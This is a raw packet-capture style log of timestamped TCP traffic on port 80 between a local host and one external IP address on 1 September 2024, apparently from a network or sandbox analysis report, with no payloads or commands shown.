Sep 1, 2024 18:28:22.456645012 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.456655025 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.456662893 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.456665993 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.456676960 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.456686974 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.456686974 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.456698895 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.456703901 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.456710100 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.456727028 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.456748962 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.542999029 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543019056 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543030977 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543073893 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543080091 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.543085098 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543097019 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543103933 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.543108940 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543139935 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.543158054 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.543325901 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543338060 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543348074 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543359995 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543365955 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.543370962 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543382883 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543384075 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.543394089 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543406963 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543412924 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.543420076 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543431044 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.543443918 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.543472052 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.543633938 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543646097 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543656111 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543668032 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543672085 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.543679953 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543689966 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.543690920 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543703079 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543713093 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.543718100 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543731928 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.543901920 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543911934 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543922901 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.543927908 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.543937922 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.543962955 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.544136047 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.544147968 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.544157982 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.544168949 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.544179916 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.544181108 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.544193029 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.544207096 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.544218063 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.544239044 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.544239044 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.544250965 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.544253111 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.544261932 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.544272900 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.544280052 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.544286013 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.544296980 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.544298887 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.544307947 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.544320107 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.544325113 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.544331074 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.544347048 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.544348001 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.544359922 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.544364929 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.544370890 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.544382095 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.544384003 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.544394016 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.544405937 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.544410944 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.544435978 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.544449091 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.545061111 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545072079 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545083046 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545094967 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545104027 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.545108080 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545120955 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545131922 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545131922 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.545144081 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545155048 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545160055 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.545165062 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545177937 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545181036 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.545188904 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545201063 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545201063 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.545218945 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.545233011 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.545473099 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545485020 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545495033 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545506954 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545512915 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.545528889 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.545543909 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.545591116 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545603037 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545614958 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545625925 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545628071 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.545636892 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545649052 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545654058 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.545660019 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545671940 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545680046 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.545686007 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545698881 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.545700073 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.545712948 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.545738935 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.546202898 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.546214104 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.546224117 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.546236038 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.546247005 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.546247959 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.546267986 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.546271086 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.546284914 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.546294928 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.546295881 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.546307087 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.546317101 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.546323061 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.546329021 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.546343088 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.546355009 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.546358109 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.546365023 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.546365976 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.546377897 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.546389103 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.546396971 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.546400070 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.546412945 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.546425104 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.546426058 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.546436071 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.546443939 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.546447992 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.546459913 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.546469927 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.546471119 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.546499968 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.546513081 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.547061920 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.547074080 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.547084093 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.547096014 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.547101974 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.547106981 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.547118902 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.547122002 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.547128916 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.547142982 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.547147989 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.547168016 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.547180891 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.629421949 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.629442930 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.629451990 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.629514933 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.629586935 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.629599094 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.629611969 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.629628897 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.629632950 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.629643917 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.629652977 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.629666090 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.629677057 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.629683018 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.629712105 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.629751921 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.629790068 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.629822969 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.629832983 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.629844904 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.629857063 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.629858017 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.629868031 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.629877090 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.629903078 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.629981995 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.629992962 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630003929 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630014896 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630027056 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.630039930 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.630069971 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.630136967 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630147934 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630157948 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630167961 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630177021 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.630179882 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630203009 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.630223989 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.630290985 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630304098 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630314112 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630326033 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630330086 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.630345106 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.630383968 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.630480051 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630491018 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630501032 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630511999 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630522013 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630543947 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.630572081 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.630621910 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630633116 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630645037 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630656958 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630666018 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630671978 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.630676985 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630678892 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.630703926 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.630856991 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630867958 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630878925 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630902052 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.630916119 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.630940914 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630951881 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630963087 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630974054 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630984068 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.630987883 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.631000042 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631014109 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.631027937 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.631050110 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.631200075 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631211996 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631222010 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631234884 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.631253004 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.631263971 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.631294012 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631310940 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631321907 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631333113 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631342888 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631346941 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.631355047 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631372929 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631376982 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.631396055 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.631422043 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.631580114 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631589890 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631638050 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.631644964 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631656885 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631666899 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631679058 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631681919 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.631706953 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.631752014 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.631910086 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631922007 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631931067 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631942987 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631953001 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631957054 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.631963015 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631973982 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631985903 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.631988049 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.632005930 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.632009983 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632025957 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632030964 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.632036924 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632046938 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632055044 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.632056952 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632070065 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632086039 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632086992 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.632097006 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632107973 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632110119 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.632122993 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.632124901 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632147074 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.632168055 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.632733107 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632757902 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632769108 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632778883 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632791042 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632800102 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.632802010 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632812023 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632829905 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632841110 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632850885 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632850885 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.632863998 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632870913 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.632874966 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632884026 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.632885933 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632900953 CEST	80	56177	91.202.233.158	192.168.2.4
